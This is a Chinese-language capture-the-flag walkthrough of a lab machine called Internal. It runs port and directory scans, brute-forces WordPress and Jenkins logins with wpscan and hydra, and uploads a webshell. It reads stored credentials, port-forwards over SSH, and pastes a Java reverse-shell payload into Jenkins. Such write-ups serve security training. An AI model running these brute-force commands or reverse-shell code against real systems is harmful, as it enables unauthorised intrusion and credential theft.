Skip to main content

Internal

端口扫描

root@ip-10-10-193-102:~# nmap -sTCV -p- --min-rate 1000 10.10.220.148

Starting Nmap 7.60 ( https://nmap.org ) at 2023-10-15 11:05 BST
Nmap scan report for ip-10-10-220-148.eu-west-1.compute.internal (10.10.220.148)
Host is up (0.0010s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
|   256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
|_  256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (EdDSA)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 02:89:E0:C2:C5:39 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.82 seconds

80

root@ip-10-10-193-102:~# gobuster dir -u http://10.10.220.148/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.220.148/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt,html
[+] Timeout:        10s
===============================================================
2023/10/15 11:06:04 Starting gobuster
===============================================================
/index.html (Status: 200)
/blog (Status: 301)
/wordpress (Status: 301)
/javascript (Status: 301)
/phpmyadmin (Status: 301)
/server-status (Status: 403)
===============================================================
2023/10/15 11:10:23 Finished
===============================================================

通过目录扫描我们可以确认其是一个 wordpress 站点, 之后我使用 wpscan 扫描出其中的用户, 之后进行了再次进行了扫描, 但是没有发现什么可以利用的地方, 之后就进行了暴力破解获得了 admin 用户密码

root@ip-10-10-193-102:~/internal# wpscan --password-attack xmlrpc -t 20 -U admin -P `locate rockyou.txt` --url http://10.10.220.148/blog/
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - admin / my2boys

之后登陆管理员后台上传 WebShell, 就不过多说了

后渗透

www-data

访问我们上传的 WebShell 就获取到了 www-data 用户的 Shell

image-20240709195119008

www-data —>aubreanna

在浏览 opt 目录时我发现其中有一个特殊名称的文件, 经过查看我发现其中是 aubreanna 凭证

(remote) www-data@internal:/$ ls -al /opt
total 16
drwxr-xr-x  3 root root 4096 Aug  3  2020 .
drwxr-xr-x 24 root root 4096 Aug  3  2020 ..
drwx--x--x  4 root root 4096 Aug  3  2020 containerd
-rw-r--r--  1 root root  138 Aug  3  2020 wp-save.txt
(remote) www-data@internal:/$ cd opt
(remote) www-data@internal:/opt$ cat wp-save.txt 
Bill,

Aubreanna needed these credentials for something later.  Let her know you have them and where they are.

aubreanna:bubb13guM!@#123
(remote) www-data@internal:/opt$ su aubreanna
Password: 
aubreanna@internal:/opt$ id
uid=1000(aubreanna) gid=1000(aubreanna) groups=1000(aubreanna),4(adm),24(cdrom),30(dip),46(plugdev)

aubreanna —> jenkins

在用户 aubreanna 的家目录搜索时, 我发现一些特殊的文件内容

aubreanna@internal:~$ cat jenkins.txt 
Internal Jenkins service is running on 172.17.0.2:8080

image-20240709195131385

从上面的这些内容中我们知道 root 用户启动了一个 jenkines 的 docker , 所以我们需要通过端口转发来实现访问这个服务

$ ssh -L  8080:127.0.0.1:8080  [email protected] # 使用此命令进行端口转发
.....

image-20240709195139308

通过访问我们可以发现这是一个登陆窗口, 但是我们需要获取账号, 所以我们可能需要暴力破解, jenkines 的默认账号时 admin, 进行暴力破解

$ hydra -l admin -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -s 8080  127.0.0.1 http-post-form "/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:Invalid username or password"

Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-20 17:08:47
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking http-post-form://127.0.0.1:8080/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:Invalid username or password
[8080][http-post-form] host: 127.0.0.1   login: admin   password: spongebob
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-20 17:09:42

登陆之后我搜索了如何利用 Jenkins getShell 最终获取到了如下的命令执行方式, 我们可以从下面发现确实完成了命令执行

image-20240709195146289

接着继续搜索我发现了 rev 的方法

String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

我们只需要利用此就可以获取到一个 Shell

image-20240709195152423

jenkins —> root

在获取到 Docker 中搜索我最终发现在 opt 目录下也存在一个同样的笔记内容, 其中是 root 的账号

(remote) jenkins@jenkins:/opt$ cat note.txt 
Aubreanna,

Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here.  Use them if you 
need access to the root user account.

root:tr0ub13guM!@#123